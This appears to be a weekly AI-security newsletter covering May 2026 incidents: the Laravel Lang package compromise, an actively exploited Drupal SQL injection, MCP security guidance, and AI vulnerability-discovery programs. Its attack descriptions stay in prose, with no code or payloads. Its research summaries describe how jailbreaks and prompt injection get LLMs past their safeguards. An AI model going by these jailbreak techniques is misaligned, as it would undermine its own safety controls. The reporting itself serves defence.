Last Week in AI Security — Week of May 18, 2026

Executive Summary

The week of May 18, 2026, demonstrates the dual-edged nature of AI in cybersecurity: while AI-powered tools are discovering vulnerabilities at unprecedented scale, they are also collapsing the window defenders have to respond. Verizon’s 2026 Data Breach Investigations Report reveals that exploiting vulnerabilities now triggers 31% of all breaches—surpassing stolen credentials for the first time in the report’s history—as AI has compressed the gap between disclosure and exploitation from months down to hours.

On May 20, the NSA’s Artificial Intelligence Security Center released new guidance on securing AI-driven automation leveraging the Model Context Protocol (MCP), addressing critical architecture risks in agentic AI systems. The timing is significant: Anthropic disclosed on May 23 that Project Glasswing has helped uncover more than 10,000 high- or critical-severity vulnerabilities across some of the most “systemically” important software since the initiative launched last month. This defensive achievement contrasts sharply with the offensive reality reported by security researchers scanning exposed AI infrastructure, who found that authentication is simply not enabled by default in many ML projects, leaving real user data and company tooling exposed to anyone who looked.

The Drupal Core SQL injection vulnerability CVE-2026-9082 (CVSS 6.5) came under active exploitation less than two days after patches were released on May 22, with CISA adding it to the Known Exploited Vulnerabilities catalog. Meanwhile, a supply chain compromise of the Laravel Lang organization resulted in over 700 malicious package versions being published in rapid succession on May 22 and 23, with tags appearing only seconds apart, indicating automated mass tagging or republishing. Organizations must recognize that the patch-to-exploit timeline has fundamentally changed, and traditional vulnerability management cadences are no longer sufficient in an AI-accelerated threat landscape.

Top Stories

NSA Releases Security Design Considerations for Model Context Protocol

On May 20, 2026, the National Security Agency’s Artificial Intelligence Security Center (AISC) released a Cybersecurity Information Sheet (CSI) titled “Model Context Protocol (MCP): Security Design Considerations.” The guidance addresses growing concerns about the security architecture of AI agent systems that use Anthropic’s Model Context Protocol, a framework increasingly adopted for connecting LLMs to external tools, data sources, and APIs.

The timing of the NSA guidance coincides with heightened scrutiny of agentic AI security. The Model Context Protocol enables LLMs to interact with file systems, databases, APIs, and code execution environments—capabilities that dramatically expand the attack surface when security controls are inadequate. Previous vulnerabilities in MCP implementations (CVE-2025-49596, CVE-2026-22252) have highlighted execution risks, with Anthropic stating the behavior is “expected” rather than altering the protocol’s architecture, meaning developers inheriting Anthropic’s MCP reference implementation face execution risks even if individual vendors patch their specific implementations.

The NSA guidance is expected to provide architectural security controls for MCP server deployments, focusing on isolation, access control, input validation, and monitoring. Recommended mitigations include blocking public IP access to sensitive services running MCP, monitoring MCP tool invocations for unusual activity, running MCP-enabled services within a sandbox environment, treating all external MCP configuration input as untrusted data, and only installing MCP servers from verified sources to mitigate supply-chain risks.

Organizations deploying agentic AI systems should treat the NSA guidance as a baseline security requirement, recognizing that AI agents with tool access represent a fundamentally different threat model than traditional LLM applications.

Anthropic’s Project Glasswing Discovers 10,000+ Critical Vulnerabilities in Global Software Infrastructure

Anthropic disclosed on Friday, May 23, that Project Glasswing has helped uncover more than 10,000 high- or critical-severity vulnerabilities across some of the most “systemically” important software worldwide since the cybersecurity initiative went live last month. Project Glasswing represents Anthropic’s defensive effort to use its Claude Mythos Preview model—which has generated significant concern due to its offensive cyber capabilities—to systematically audit critical open-source and enterprise software.

The scale of the vulnerability discovery is unprecedented. While Google’s Threat Intelligence Group reported in the previous week that the first AI-assisted zero-day had been discovered and exploited by criminals, Anthropic’s announcement demonstrates the defensive potential of the same technology. The Glasswing initiative operates as a closed program, providing access to Claude Mythos Preview strictly for defensive work by a select group of organizations including Verizon and government agencies.

Mythos, announced on April 7, runs inside Anthropic’s “Project Glasswing,” with specialists saying its high-level coding ability gives it a possibly unmatched knack for spotting vulnerabilities and working out how to exploit them. The model’s capability has prompted government officials’ attention, with Anthropic CEO Dario Amodei meeting with senior members of the Trump administration to discuss Mythos at the White House just days after it was announced.

The disclosure raises important questions about responsible AI deployment. While Anthropic has limited Mythos distribution to vetted defensive users, the technology’s existence confirms that AI models can now autonomously discover vulnerabilities at a scale and speed that human security researchers cannot match. Organizations should expect that adversaries will soon have access to similar capabilities, whether through alternative models or through compromise of defensive AI systems.

Massive Laravel Package Supply Chain Compromise Hits PHP Ecosystem

Socket security researchers discovered that the Laravel Lang organization’s release process was compromised, resulting in over 700 malicious versions being published across multiple packages on May 22 and May 23, 2026, with many versions appearing only seconds apart, suggesting automated mass tagging or republishing, and indicating attackers may have obtained organization-level credentials, repository automation, or release infrastructure access.

The compromised packages include laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions—packages that are widely used in the PHP and Laravel development ecosystem. The attack used “cross-ecosystem placement” that makes the activity stand out because developers and security teams scanning PHP dependencies may only focus on Composer-related metadata, while skipping package.json lifecycle hooks that are bundled within the package, and the malicious versions have since been removed from Packagist after analysis uncovered that their upstream repositories were modified to include a postinstall script attempting to download a Linux binary from a GitHub Releases URL.

This supply chain attack demonstrates several concerning trends: the use of legitimate package publishing infrastructure to distribute malware, the exploitation of multi-language toolchain dependencies (PHP packages containing Node.js hooks), and the rapid, automated nature of the compromise. Organizations using affected packages should immediately audit their dependencies, rotate any credentials that may have been exposed, and verify the integrity of their build environments.

The Laravel incident follows a pattern of increasingly sophisticated supply chain attacks targeting developer toolchains. Last month saw the LiteLLM compromise, and this week’s attack shows that adversaries are systematically targeting the trust relationships embedded in package ecosystems.

Framework & Standards Updates

NIST AI Risk Management Framework Developments

On April 7, 2026, NIST released a concept note for an AI RMF Profile on Trustworthy AI in Critical Infrastructure, which will guide critical infrastructure operators towards specific risk management practices to consider when engaging AI-enabled capabilities. This profile represents NIST’s continued expansion of sector-specific guidance following the July 26, 2024 release of the Generative Artificial Intelligence Profile (NIST AI 600-1), which helps organizations identify unique risks posed by generative AI and proposes actions for risk management.

NIST Cyber AI Profile Preliminary Draft

NIST released an initial preliminary draft of the Cybersecurity Framework Profile for Artificial Intelligence (Cyber AI Profile or NIST IR 8596), designed as a voluntary framework extending the recently updated NIST Cybersecurity Framework (CSF) 2.0 to new cybersecurity risks and opportunities introduced by AI and to complement NIST’s AI Risk Management Framework (AI RMF), with NIST envisioning the CSF 2.0, the AI RMF, and the Cyber AI Profile being used together.

The preliminary draft is organized around three Focus Areas: Secure (securing AI systems); Defend (conducting AI-enabled cyber defense); and Thwart (thwarting adversarial cyberattacks using AI), with a separate but related release covering “Control Overlays for Securing AI Systems” including “Overview and Methodology” (NIST IR 8605) and “Using and Fine-Tuning Predictive AI” (NIST IR 8605A).

MITRE ATLAS Expansion for Agentic AI

MITRE ATLAS now catalogs 16 tactics, 84 techniques, and 56 sub-techniques specifically targeting AI and machine learning systems, up from 15 tactics and 66 techniques as of October 2025, with the November 2025 framework update (v5.1.0) expanding to 16 tactics, 84 techniques, 32 mitigations, and 42 case studies, and continued updates through February 2026 adding agentic AI techniques.

The February 2026 v5.4.0 update added further agent-focused techniques including “Publish Poisoned AI Agent Tool” and “Escape to Host.” These additions reflect the evolving threat landscape as AI agents gain production access to internal systems and external tools.

Vulnerability Watch

Critical and Actively Exploited

CVE-2026-9082: Drupal Core SQL Injection (CVSS 6.5)

CISA added CVE-2026-9082, a SQL injection vulnerability affecting all supported versions of Drupal Core, to the Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation, with the vulnerability allowing privilege escalation and remote code execution via specially crafted requests sent with the database abstraction API, and news of exploitation arriving less than two days after Drupal released fixes on May 22, 2026.

Affected versions: All supported Drupal versions
Patched versions: Drupal 11.3.10, 11.2.12, 11.1.10, 10.6.9, 10.5.10, 10.4.10 (manual patching required for 9.5 and 8.9)
Mitigation: Immediate patching is required. Organizations running Drupal should treat this as a patch-or-die scenario given the sub-48-hour time-to-exploit.

Supply Chain Vulnerabilities

Laravel Lang Organization Compromise (May 22-23, 2026)

The Laravel Lang organization’s release process was compromised, resulting in over 700 malicious package versions published across laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions, with versions appearing only seconds apart on May 22 and May 23, 2026.

Mitigation: Remove malicious versions, verify package integrity, audit systems that may have installed compromised versions, rotate credentials.

CVE-2025-34291: Langflow Remote Code Execution (CVSS 9.4)

CVE-2025-34291 is an origin validation error vulnerability in Langflow that could allow an attacker to execute arbitrary code and achieve full system compromise. The vulnerability exploits three combined weaknesses: overly permissive CORS, lack of cross-site request forgery (CSRF) protection, and an endpoint that allows code execution.

Affected versions: On-premise Langflow deployments
Mitigation: Apply vendor patches, implement network segmentation, restrict access to Langflow management interfaces.

AI/ML Framework Vulnerabilities

CVE-2026-32207: Microsoft Azure Machine Learning XSS (CVSS High)

CVE-2026-32207 involves improper neutralization of input during web page generation (‘cross-site scripting’) in Azure Machine Learning, allowing an unauthorized attacker to perform spoofing over a network.

The vulnerability presents high risk for organizations exposing Azure Machine Learning notebooks to untrusted users, with exploitation requiring user interaction but not privileges, and notebook spoofing via web scripting can enable attackers to trick users into running actions, leaking sensitive notebook/session data, or performing unauthorized workflows through the UI, which in ML environments can quickly translate into data exposure and integrity loss across projects and teams.

Mitigation: Restrict notebook access, implement content security policies, update to patched Azure ML versions.

Industry Radar

OpenAI Launches $4 Billion Deployment Company

OpenAI stood up the OpenAI Deployment Company backed by more than $4 billion in initial capital to support organizations in adopting and scaling AI, acquiring AI consulting firm Tomoro to provide immediate staffing for the venture, with OpenAI holding a majority ownership and control stake, and the Tomoro deal bringing roughly 150 engineers and specialists in AI deployment to the organization from launch.

US Government Expands Pre-Deployment AI Model Testing

The Center for AI Standards and Innovation announced agreements with Google DeepMind, Microsoft and Elon Musk’s xAI that will allow the U.S. government to evaluate artificial intelligence models before they are publicly available, with CAISI conducting “pre-deployment evaluations and targeted research to better assess frontier AI capabilities and advance the state of AI security,” building on previous partnerships with OpenAI and Anthropic from 2024.

Trump Delays AI Security Executive Order

On May 21, 2026, President Donald Trump delayed signing an executive order that would allow the government to evaluate AI models before they’re released, claiming he is not happy with the language: “I didn’t like certain aspects of it,” Trump told the White House press pool, adding “We’re leading China, we’re leading everybody, and I don’t want to do anything that’s going to get in the way of that leading,” with the unofficial reason being that not enough tech CEOs could make it to Washington, D.C. on short notice.

The anticipated executive order would have tasked the Office of the National Cyber Director and other agencies with developing a process to evaluate AI models for security before their release.

Pwn2Own Berlin 2026: 47 Zero-Days Disclosed

The Pwn2Own Berlin 2026 hacking contest concluded with security researchers collecting $1,298,250 in rewards after exploiting 47 zero-day flaws in various products from Windows, Linux, VMware, and NVIDIA, with DEVCORE winning the event with 50.5 Master of Pwn points and $505,000 in rewards throughout the three-day contest.

Policy Corner

EU AI Act Enforcement Timeline

EU AI Act enforcement begins August 2026, with penalties exceeding GDPR fine levels. The EU AI Act’s first binding obligations (prohibitions, general-purpose AI transparency) have come into effect, with high-risk AI system obligations beginning phased enforcement into 2026, and NIST RMF widely used as a technical companion framework for AI Act compliance.

US State-Level AI Regulation

Many state-level AI regulations reference NIST standards. Organizations operating in multiple jurisdictions should monitor state-level AI legislation, as requirements are rapidly diverging across states.

China Blocks Meta AI Acquisition

China’s National Development and Reform Commission formally blocked Meta’s $2B acquisition of the Chinese agent startup Manus, ordering both parties to withdraw the transaction—the first state-level prohibition of an inbound AI acquisition by China.

Research Spotlight

Prompt Injection and Jailbreak Attacks in Large Language Model-Based Agents (Rizwan Tanveer, May 9, 2026, SSRN)

This paper synthesizes the prompt-injection and jailbreak literature from 2023 to 2026, examining how the agentic deployment context—integrating retrieval, tool invocation, persistent memory, and the Model Context Protocol—has dramatically expanded the prompt-injection attack surface, and positions prompt injection as a problem requiring defence-in-depth across input, retrieval, planning, tool execution, and output layers, rather than a single-control problem.

Analysis of LLMs Against Prompt Injection and Jailbreak Attacks (arXiv, February 24, 2026)

A key insight emerging from this research is that jailbreak attacks exploit the inherent tension between helpfulness and harmlessness objectives in aligned LLMs, with models prioritizing instruction-following and narrative consistency over strict safety enforcement when presented with sufficiently coherent, contextually rich, or multi-step reasoning prompts.

Adversarial Machine Learning: A 20-Year Survey of Attacks, Defenses, and Standards (April 30, 2026)

This comprehensive survey examines how Adversarial Machine Learning (AML) presents a significant barrier to the large-scale deployment of AI in safety-critical environments, with the field evolving from early algorithmic robustness research to a broader focus on real-world deployment challenges, covering publications from 2002 to March 2026.

Query-efficient decision-based adversarial attack with low query budget (Nature Scientific Reports, February 2, 2026)

This paper presents a novel decision-based attack called “one plane one query attack” (OPOQA) designed to generate high-quality adversarial examples with low query budget, addressing the challenge that existing decision-based attacks require thousands of queries, with the main idea being to generate more candidate examples in each iteration for random exploration of the decision boundary and select the most suitable adversarial example for the next iteration.

RogueGPT: Unleashing Jailbreak Prompts on LLMs (Shivaswaroopa et al., Engineering Reports, April 2026)

The paper notes that considering the robust security measures implemented by LLM creator organizations, a simple jailbreak may not suffice to access illicit data, hence a combination of different jailbreak methods is employed to successfully retrieve the required information, with the development of current jailbreak prompts requiring substantial research and dedication from numerous researchers and enthusiasts.

What This Means For You

Accelerate your patch cycles immediately. The Verizon DBIR confirms that vulnerability exploitation now accounts for 31% of breaches, surpassing credentials for the first time, with AI compressing the time-to-exploit from months to hours. The Drupal SQL injection CVE-2026-9082 was exploited within 48 hours of patch release. Traditional monthly patching schedules are no longer viable for critical systems. Implement continuous vulnerability monitoring and establish emergency patching procedures for internet-facing systems.

Treat AI agent deployments as high-risk execution environments. The NSA’s MCP security guidance arrives as organizations rush to deploy agentic AI systems. Every AI agent with tool access represents a potential command execution surface. Block public IP access to MCP services, monitor tool invocations for anomalies, and run MCP-enabled services in isolated sandbox environments. Do not treat LLM agents as content generators—they are privileged code execution platforms and should be secured accordingly.

Audit your supply chain with AI-specific scrutiny. The Laravel package compromise demonstrates that attackers are targeting developer toolchains with increasing sophistication. Organizations should implement dependency scanning that catches cross-language attacks (e.g., Node.js hooks in PHP packages), verify package signatures, and use tools like Socket or Snyk to detect malicious behavior in dependencies. Consider establishing an internal package mirror for critical dependencies to provide a buffer against upstream compromises.

Plan for offensive AI capabilities in adversary hands. Anthropic’s Project Glasswing has found 10,000+ vulnerabilities using Claude Mythos. While this technology is currently restricted to defensive use, you should assume that similar offensive capabilities will become available to adversaries within 6-12 months. Conduct threat modeling exercises that assume attackers have AI-assisted vulnerability discovery tools, and prioritize architectural security controls (least privilege, network segmentation, zero trust) over reliance on obscurity or patching speed alone.

Tools and Resources

NIST Cyber AI Profile (Preliminary Draft)
NIST IR 8596 - Preliminary draft extending CSF 2.0 to AI-specific cybersecurity risks, organized around Secure, Defend, and Thwart focus areas.

NSA Model Context Protocol Security Guidance
NSA AISC Cybersecurity Information Sheet - Security design considerations for AI-driven automation using MCP, released May 20, 2026.

MITRE ATLAS v5.4.0
atlas.mitre.org - Updated framework with 16 tactics, 84 techniques, and new agentic AI attack patterns including “Publish Poisoned AI Agent Tool” and “Escape to Host.”

Socket Security Scanner
socket.dev - Enhanced supply chain detection for cross-language attacks and malicious package behavior. Detected the Laravel Lang organization compromise.

DARPA AI Cyber Challenge Tools
Competition finalists have developed AI systems that are revolutionizing vulnerability-hunting at far lower cost than proprietary models, with DARPA and winning teams reporting they’re thrilled with the effectiveness of the new tools at a time when the U.S. cybersecurity workforce is stretched thin and adversaries are using AI to speed up attacks.